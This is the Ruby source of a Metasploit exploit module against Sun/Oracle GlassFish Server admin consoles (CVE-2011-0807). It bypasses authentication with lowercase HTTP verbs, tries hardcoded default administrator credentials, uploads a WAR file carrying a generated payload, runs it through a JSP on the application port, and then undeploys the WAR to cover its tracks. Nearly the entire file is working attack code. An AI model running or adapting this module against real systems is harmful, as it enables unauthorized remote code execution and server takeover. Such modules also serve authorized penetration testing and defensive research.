Sun/Oracle GlassFish Server Authenticated Code Execution



##

# $Id: glassfish_deployer.rb 13485 2011-08-04 17:36:01Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE

    def initialize(info={})
        super(update_info(info,
            'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
            'Description'    => %q{
                    This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) 
                instance using a default credential, uploads, and executes commands via deploying
                a malicious WAR.  On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x
                this module will try to bypass authentication instead by sending lowercase HTTP verbs.
            },
            'License'        => MSF_LICENSE,
            'Version'        => "$Revision: 13485 $",
            'Author'         =>
                [
                    #Msf module for Glassfish 3.0
                    'juan vazquez',
                    #Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
                    'Joshua Abraham <jabra[at]rapid7.com>',
                    #Rewrite for 3.0, 3.1 (Commercial or Open Source)
                    'sinn3r',
                ],
            'References'     =>
                [
                    ['CVE', '2011-0807'],
                ],
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],
                    [
                        'Java Universal',
                        {
                            'Arch'     => ARCH_JAVA,
                            'Platform' => 'java',
                        },
                    ],
                    #
                    # platform specific targets only
                    #
                    [
                        'Windows Universal',
                        {
                            'Arch'     => ARCH_X86,
                            'Platform' => 'win',
                        },
                    ],
                    #
                    # platform specific targets only
                    #
                    [
                        'Linux Universal',
                        {
                            'Arch'     => ARCH_X86,
                            'Platform' => 'linux',
                        },
                    ],
                ],
            'DisclosureDate' => "Aug 4 2011",
            'DefaultTarget'  => 0))

            register_options(
                [
                    Opt::RPORT(4848),
                    OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
                    OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
                    OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
                    OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/'])
                ], self.class)
    end

    #
    # Send GET or POST request, and return the response
    #
    def send_request(path, method, session='', data=nil, ctype=nil)

        headers = {}
        headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
        headers['Content-Type'] = ctype if ctype != nil
        headers['Content-Length'] = data.length if data != nil

        res = send_request_raw({
            'uri'     => path,
            'method'  => method,
            'data'    => data,
            'headers' => headers,
        }, 90)

        #'vhost' => "#{datastore['rhost']}:#{datastore['rport']}"
        return res
    end

    #
    # Return target
    #
    def auto_target(session, res, version)
        print_status("Attempting to automatically select a target...")

        res = query_serverinfo(session,version)
        return nil if not res
        return nil if not res.body

        plat = detect_platform(res.body)
        arch = detect_arch(res.body)
        
        # No arch or platform found?
        return nil if (not arch or not plat)

        # see if we have a match
        targets.each do |t|
            return t if (t['Platform'] == plat) and (t['Arch'] == arch)
        end

        # no matching target found
        return nil
    end

    #
    # Return platform (win, linux, or osx)
    #
    def detect_platform(body)
        body.each_line do |ln|
            ln.chomp!
            case ln
            when /os\.name = (.*)/
                os = $1
                case os
                when /Windows/
                    return 'win'
                when /Linux/
                    return 'linux'
                when /Mac OS X/
                    return 'osx'
                end
            end
        end

        return 'java'
    end

    #
    # Return ARCH
    #
    def detect_arch(body)
        body.each_line do |ln|
            ln.chomp!
            case ln
            when /os\.arch = (.*)/
                ar = $1
                case ar
                when 'x86', 'i386', 'i686'
                    return ARCH_X86
                when 'x86_64', 'amd64'
                    return ARCH_X86
                end
            end
        end
    end

    #
    # Return server information
    #
    def query_serverinfo(session,version)
        res = ''

        if version == '2.x' or version == '9.x'
            path = "/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report"
            res = send_request(path, @verbs['GET'], session)
        else
            path = "/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report"
            res = send_request(path, @verbs['GET'], session)

            if ((not res) or (res.code != 200) or (res.body !~ /Operating System Information/))
                path = "/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server"
                res = send_request(path, @verbs['GET'], session)
            end
        end

        if (not res) or (res.code != 200)
            print_error("Failed: Error requesting #{path}")
            return nil
        end

        return res
    end

    #
    # Return viewstate and entry before deleting a GlassFish application
    #
    def get_delete_info(session, version, app='')
        if version == '2.x' or version == '9.x'
            path = '/applications/webApplications.jsf'
            res = send_request(path, @verbs['GET'], session)

            if (not res) or (res.code != 200)
                print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
                return nil
            end

            input_id = "javax.faces.ViewState"
            p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(j_id\d+:j_id\d+)"/
            viewstate = res.body.scan(p)[0][0]

            entry = nil
            p = /<a id="(.*)col1:link" href="\/applications\/webApplicationsEdit.jsf.*appName=(.*)">/
            results = res.body.scan(p)

            results.each do |hit|
                if hit[1] =~ /^#{app}/
                    entry = hit[0]
                    entry << "col0:select"
                end
            end

        else
            path = '/common/applications/applications.jsf?bare=true'
            res = send_request(path, @verbs['GET'], session)

            if (not res) or (res.code != 200)
                print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
                return nil
            end

            input_id = "javax.faces.ViewState"
            p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(.*)" autocomplete="off"/
            viewstate = res.body.scan(p)[0][0]

            entry = nil
            p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
            results = res.body.scan(p)

            results.each do |hit|
                if hit[1] =~ /^#{app}/
                    entry = hit[0]
                    entry << "col0:select"
                end
            end
        end

        if (viewstate.nil?)
            print_error("Failed: Error getting ViewState")
            return nil
        elsif (entry.nil?)
            print_error("Failed: Error getting the entry to delete")
        end

        return viewstate, entry
    end

    #
    # Send an "undeploy" request to Glassfish and remove our backdoor
    #
    def undeploy(viewstate, session, entry)
        #Send undeployment request
        data  = [
        "propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=",
        "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false",
        "&#{Rex::Text.uri_encode(entry)}=true",
        "&propertyForm%3AhelpKey=ref-applications.html",
        "&propertyForm_hidden=propertyForm_hidden",
        "&javax.faces.ViewState=#{Rex::Text.uri_encode(viewstate)}",
        "&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
        "&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
        "&javax.faces.partial.execute=%40all",
        "&javax.faces.partial.render=%40all",
        "&bare=true",
        "&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
        "&javax.faces.partial.ajax=true"
        ].join()

        path  = '/common/applications/applications.jsf'
        ctype = 'application/x-www-form-urlencoded'

        res   = send_request(path, @verbs['POST'], session, data, ctype)
        if (not res)
            print_error("Undeployment failed on #{path} - No Response")
         else
            if res.code < 200 or res.code >= 300
                print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
            end
        end
    end

    #
    # Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
    # banner (ex: Sun Java System Application Server 9.x)
    #
    def get_version(res)
        #Extract banner from response
        banner = res.headers['Server']

        #Default value for edition and glassfish version
        edition = 'Commercial'
        version = 'Unknown'

        #Set edition (Open Source or Commercial)
        p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
        edition = 'Open Source' if banner =~ p

        #Set version.  Some GlassFish servers return banner "GlassFish v3".
        if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
            version = $2
        elsif banner =~ /GlassFish v(\d)/ and (version == 'Unknown' or version.nil?)
            version = $1
        elsif banner =~ /Sun GlassFish Enterprise Server v2/ and (version.nil? or version == 'Unknown')
            version = '2.x'
        elsif banner =~ /Sun Java System Application Server 9/ and (version.nil? or version == 'Unknown')
            version = '9.x'
        end

        if version == nil or version == 'Unknown'
            print_status("Unsupported version: #{banner}")
        end

        return edition, version, banner
    end

    #
    # Return the formatted version of the POST data
    #
    def format_2_x_war(boundary,name,value=nil, war=nil)
        data = ''

        data << boundary
        data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; "
        data << "filename=\"#{name}.war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
        data << war
        data << "\r\n"

        return data
    end

    #
    # Return the formatted version of the POST data
    #
    def format(boundary,name,value=nil, war=nil)
        data = ''

        if war
            data << boundary
            data << "\r\nContent-Disposition: form-data; name=\"form:sheet1:section1:prop1:fileupload\"; "
            data << "filename=\"#{name}.war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
            data << war
            data << "\r\n"
        else
            data << boundary
            data << "\r\nContent-Disposition: form-data; name=\"#{name}\""
            data << "\r\n\r\n"
            data << "#{value}\r\n"
        end

        return data
    end

    #
    # Return POST data and data length, based on GlassFish edition
    #
    def get_upload_data(boundary, version, war, app_base, typefield='', status_checkbox='', start='', viewstate='')
        data = ''

        if version == '3.0'

            uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
            uploadparam_data = "form:sheet1:section1:prop1:fileupload"

            boundary = "--#{boundary}"

            data = [
                format(boundary, app_base, nil, war),
                format(boundary, uploadParam_name, uploadparam_data),
                format(boundary, "form:sheet1:section1:prop1:extension", ".war"),
                format(boundary, "form:sheet1:section1:prop1:action", "client"),
                format(boundary, typefield, "war"),
                format(boundary, "form:war:psection:cxp:ctx", app_base),
                format(boundary, "form:war:psection:nameProp:appName", app_base),
                format(boundary, "form:war:psection:vsProp:vs", ""),
                format(boundary, status_checkbox, "true"),
                format(boundary, "form:war:psection:librariesProp:library", ""),
                format(boundary, "form:war:psection:descriptionProp:description", ""),
                format(boundary, "form_hidden", "form_hidden"),
                format(boundary, "javax.faces.ViewState", viewstate),
                "#{boundary}--"
            ].join()
        elsif version == '2.x' or version == '9.x'

            uploadParam_name = "form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
            uploadParam_data = "form:title:sheet1:section1:prop1:fileupload"

            focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
            focusElementId_data = 'form:title:topButtons:uploadButton'

            boundary = "-----------------------------#{boundary}"

            data = [
                format_2_x_war(boundary, app_base, nil, war),
                format(boundary, "form:title:sheet1:section1:type:appType", "webApp"),
                format(boundary, "uploadRdBtn", "client"),
                format(boundary, uploadParam_name, uploadParam_data),
                format(boundary, "form:title:sheet1:section1:prop1:extension", ".war"),
                format(boundary, "form:title:ps:psec:nameProp:appName", app_base),
                format(boundary, "form:title:ps:psec:cxp:ctx", app_base),
                format(boundary, "form:title:ps:psec:vsp:vs", ""),
                format(boundary, status_checkbox, "true"),
                format(boundary, "form:title:ps:psec:librariesProp:library", ""),
                format(boundary, "form:title:ps:psec:threadpoolProp:threadPool", ""),
                format(boundary, "form:title:ps:psec:registryProp:registryType", ""),
                format(boundary, "form:title:ps:psec:descriptionProp:description", ""),
                format(boundary, "form:helpKey", "uploaddev.html"),
                format(boundary, "form_hidden", "form_hidden"),
                format(boundary, "javax.faces.ViewState", viewstate),
                format(boundary, focusElementId_name, focusElementId_data),
                "#{boundary}--"
            ].join()
        else

            boundary = "-----------------------------#{boundary}"

            #Setup dynamic arguments
            num1 = start.to_i
            num2 = num1 + 14
            num3 = num2 + 2
            num4 = num3 + 2
            num5 = num4 + 2
            num6 = num5 + 2
            num7 = num6 + 1

            id0 = num4
            id1 = num4 + 1
            id2 = num4 + 2
            id3 = num4 + 3
            id4 = num4 + 4
            id5 = num4 + 5
            id6 = num4 + 6
            id7 = num4 + 7
            id8 = num4 + 8
            id9 = num4 + 9

            uploadParam_name  = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
            uploadParam_value = "form:sheet1:section1:prop1:fileupload"

            focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
            focusElementId_data = "form:title2:bottomButtons:uploadButton"

            data = [
                format(boundary,"uploadRdBtn","client"),
                ## web service
                format(boundary, app_base, nil, war),
                ## sheet1
                format(boundary, uploadParam_name, uploadParam_value),
                format(boundary,"form:sheet1:section1:prop1:extension",".war"),
                format(boundary,"form:sheet1:section1:prop1:action","client"),
                format(boundary,"form:sheet1:sun_propertySheetSection#{num1.to_s}:type:appType","war"),
                format(boundary,"form:appClient:psection:nameProp:appName","#{app_base}"),
                format(boundary,"form:appClient:psection:descriptionProp:description"),
                ## war
                format(boundary,"form:war:psection:cxp:ctx","#{app_base}"),
                format(boundary,"form:war:psection:nameProp:appName","#{app_base}"),
                format(boundary,"form:war:psection:vsProp:vs"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id1.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id2.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id3.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id4.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id5.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id6.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
                format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
                format(boundary,"form:war:psection:librariesProp:library"),
                format(boundary,"form:war:psection:descriptionProp:description"),
                format(boundary,"form_hidden","form_hidden"),
                format(boundary,"javax.faces.ViewState","#{viewstate}"),
                format(boundary, focusElementId_name, focusElementId_data)
            ].join()

            item_list_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list"
            item_list_data = "|server|com.sun.webui.jsf.separator|"

            item_value_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value"
            item_value_data = "server"

            data << format(boundary, item_list_name, item_list_data)
            data << format(boundary, item_value_name, item_value_data)
            data << "#{boundary}--"
            data << "\r\n\r\n"

        end

        return data
    end

    #
    # Upload our payload, and execute it.  This function will also try to automatically
    # clean up after itself.
    #
    def upload_exec(session, app_base, jsp_name, target, war, edition, version)
        if version == '2.x' or version == '9.x'
            path = "/applications/upload.jsf?appType=webApp"
            res = send_request(path, @verbs['GET'], session)

            #Obtain some properties
            begin
                p1 = /id="javax\.faces\.ViewState" value="(j_id\d{1,5}:j_id\d{1,5})"/mi
                p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
                viewstate       = res.body.scan(p1)[0][0]
                status_checkbox = res.body.scan(p2)[0][0]
                boundary        = rand_text_alphanumeric(28)
            rescue
                print_error("Unable to gather required data for file upload")
                return
            end
        else
            path = "/common/applications/uploadFrame.jsf"
            res = send_request(path, @verbs['GET'], session)

            #Obtain some properties
            begin
                #start is only for dynamic arguments in POST data
                res.body =~ /propertySheetSection(\d{3})/
                start = $1
                p1 = /"javax\.faces\.ViewState" value="(-?\d+:-?\d+)"/mi
                p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
                p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/

                rnd_text = rand_text_alphanumeric(29)

                viewstate       = res.body.scan(p1)[0][0]
                typefield       = res.body.scan(p2)[0][0]
                status_checkbox = res.body.scan(p3)[0][0]
                boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
            rescue
                print_error("Unable to gather required data for file upload")
                return
            end
        end

        #Get upload data
        if version == '3.0'
            ctype = "multipart/form-data; boundary=#{boundary}"
        elsif version == '2.x' or version == '9.x'
            ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
            typefield = ''
            start = ''
        else
            ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
        end

        post_data = get_upload_data(boundary, version, war, app_base, typefield, status_checkbox, start, viewstate)

        #Upload our payload
        if version == '2.x' or version == '9.x'
            path = '/applications/upload.jsf?form:title:topButtons:uploadButton=%20%20OK%20%20'
        else
            path  = '/common/applications/uploadFrame.jsf?'
            path << 'form:title:topButtons:uploadButton=Processing...'
            path << '&bare=false'
        end
        res  = send_request(path, @verbs['POST'], session, post_data, ctype)

        #Print upload result
        if res and res.code == 302
            print_status("Successfully uploaded")
        else
            print_error("Error uploading #{res.code}")
            return
        end

        #Execute our payload using the application interface (no need to use auth bypass technique)
        jsp_path = "/" + app_base + "/" + jsp_name + ".jsp"
        nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
            {
                'Msf'        => framework,
                'MsfExploit' => self,
            }
        )

        print_status("Executing #{jsp_path}...")
        req = nclient.request_raw({
            'uri'     => jsp_path,
            'method'  => 'GET',
        })

        if (req)
            res = nclient.send_recv(req, 90)
        else
            print_status("Error: #{rhost} did not respond on #{app_rport}.")
        end

        #Sleep for a bit before cleanup
        select(nil, nil, nil, 5)

        #Start undeploying
        print_status("Getting information to undeploy...")
        viewstate, entry = get_delete_info(session, version, app_base)
        if (not viewstate)
            raise RuntimeError, "Unable to get viewstate"
        elsif (not entry)
            raise RuntimeError, "Unable to get entry"
        end

        print_status("Undeploying #{app_base}...")
        undeploy(viewstate, session, entry)

        print_status("Undeployment complete.")
    end

    #
    # Try to login to Glassfish with a credential, and return the response
    #
    def try_login(user, pass)
        data  = "j_username=#{Rex::Text.uri_encode(user.to_s)}&"
        data << "j_password=#{Rex::Text.uri_encode(pass.to_s)}&"
        data << "loginButton=Login"

        path = '/j_security_check'
        res = send_request(path, @verbs['POST'], '', data, 'application/x-www-form-urlencoded')

        return res
    end

    def log_success(user,pass)
        print_good("#{target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
        report_auth_info(
            :host   => rhost,
            :port   => rport,
            :sname  => 'http',
            :user   => user,
            :pass   => pass,
            :proof  => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
            :active => true
        )
    end

    def try_default_glassfish_login(version)
        success = false
        session = ''
        res = ''
        if version == '2.x' or version == '9.x'
            user = 'admin'
            pass = 'adminadmin'

            print_status("Trying default credential GlassFish 2.x #{user}:'#{pass}'....")
            res = try_login(user,pass)
            if res and res.code == 302
                session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
                res = send_request('/applications/upload.jsf', 'GET', session)

                p = /<title>Deploy Enterprise Applications\/Modules/
                if (res and res.code.to_i == 200 and res.body.match(p) != nil)
                    success = true
                end
            end

        else
            user = 'admin'
            pass = ''

            print_status("Trying default credential GlassFish 3.x #{user}:'#{pass}'....")
            res = try_login(user,pass)
            if res and res.code == 302
                session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
                res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)

                p = /<title>Deploy Applications or Modules/
                if (res and res.code.to_i == 200 and res.body.match(p) != nil)
                    success = true
                end
            end
        end

        if success == true
            log_success(user,pass)
        else
            msg = "#{target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
            print_error(msg)
        end

        return success, res, session
    end

    def try_nondefault_glassfish_login(version,user,pass)

        print_status("Trying credential #{user}:'#{pass}'....")
        success = false
        session = ''

        res = try_login(user, pass)
        if version == '2.x' or version == '9.x'
            if res and res.code == 302
                session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
                res = send_request('/applications/upload.jsf', 'GET', session)

                p = /<title>Deploy Enterprise Applications\/Modules/
                if (res and res.code.to_i == 200 and res.body.match(p) != nil)
                    success = true
                end
            end
        else
            if res and res.code == 302
                session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
                res = send_request('/common/index.jsf', 'GET', session)

                p = /<title>Deploy Applications or Modules/
                if (res and res.code.to_i == 200 and res.body.match(p) != nil)
                    success = true
                end
            end
        end

        if success == true
            log_success(user,pass)
        else
            msg = "#{target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
            print_error(msg)
        end

        return success, res, session
    end


    def try_glassfish_auth_bypass(version)
        print_status("Trying GlassFish authentication bypass..")
        success = false

        if version == '2.x' or version == '9.x'
            res = send_request('/applications/upload.jsf', 'get')
            p = /<title>Deploy Enterprise Applications\/Modules/
            if (res and res.code.to_i == 200 and res.body.match(p) != nil)
                success = true
            end
        else
            # 3.0
            res = send_request('/common/applications/uploadFrame.jsf', 'get')
            p = /<title>Deploy Applications or Modules/
            if (res and res.code.to_i == 200 and res.body.match(p) != nil)
                success = true
            end
        end

        if success == true
            print_good("#{target_host} - GlassFish - SUCCESSFUL authentication bypass")
            report_auth_info(
                :host   => rhost,
                :port   => rport,
                :sname  => 'http',
                :user   => '',
                :pass   => '',
                :proof  => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
                :active => true
            )
        else
            print_error("#{target_host()} - GlassFish - Failed authentication bypass")
        end

        return success
    end

    def target_host
        path        = datastore['PATH']
        target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
    end

    def exploit
        user        = datastore['USERNAME']
        pass        = datastore['PASSWORD']
        path        = datastore['PATH']
        target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
        success     = false
        session     = ''
        edition     = ''
        version     = ''

        #Invoke index to gather some info
        res = send_request('/common/index.jsf', 'GET')

        if res.code == 302
            res = send_request('/login.jsf', 'GET')
        end

        #Get GlassFish version
        edition, version, banner = get_version(res)
        print_status("Glassfish edition: #{banner}")

        #Get session
        res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /
        session = $1

        #Set HTTP verbs.  lower-case is used to bypass auth on v3.0
        @verbs = {
            'GET'  => (version == '3.0' or version == '2.x' or version == '9.x') ? "get" : 'GET',
            'POST' => (version == '3.0' or version == '2.x' or version == '9.x') ? 'post' : 'POST',
        }
        
        #auth bypass
        if version == '3.0' or version == '2.x' or version == '9.x'
            success = try_glassfish_auth_bypass(version)
        end

        #BUG caused us to skip default cred checks on sun applicaiton server 9.x 
        if success == false and version != '9.x'
            #default credentials
            success,res,session_login = try_default_glassfish_login(version)
            if success == false
                if (
                    ( (version == '2.x' ) and (user != 'admin' and pass != 'adminadmin') )  or 
                    ( (version =~ /^3\./) and (user != 'admin' and pass != '') )
                )
                    #non-default login
                    success,res,session_login = try_nondefault_glassfish_login(version,user,pass)
                end
            end
        end

        #Start attacking
        if success
            session = session_login if (session_login =~ /\w+/)
            #Set target
            mytarget = target
            mytarget = auto_target(session, res, version) if mytarget.name =~ /Automatic/
            raise RunTimeError, "Unable to automatically select a target" if (not mytarget)

            #Generate payload
            p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)

            jsp_name = rand_text_alphanumeric(4+rand(32-4))
            app_base = rand_text_alphanumeric(4+rand(32-4))

            war = p.encoded_war({
                :app_name    => app_base,
                :jsp_name    => jsp_name,
                :arch        => mytarget.arch,
                :platform    => mytarget.platform
            }).to_s

            #Upload, execute, cleanup, winning
            print_status("Uploading payload...")
            res = upload_exec(session, app_base, jsp_name, mytarget, war, edition, version)
        else
            print_error("#{target_host()} - GlassFish - Failed to authenticate login")
        end

    end
end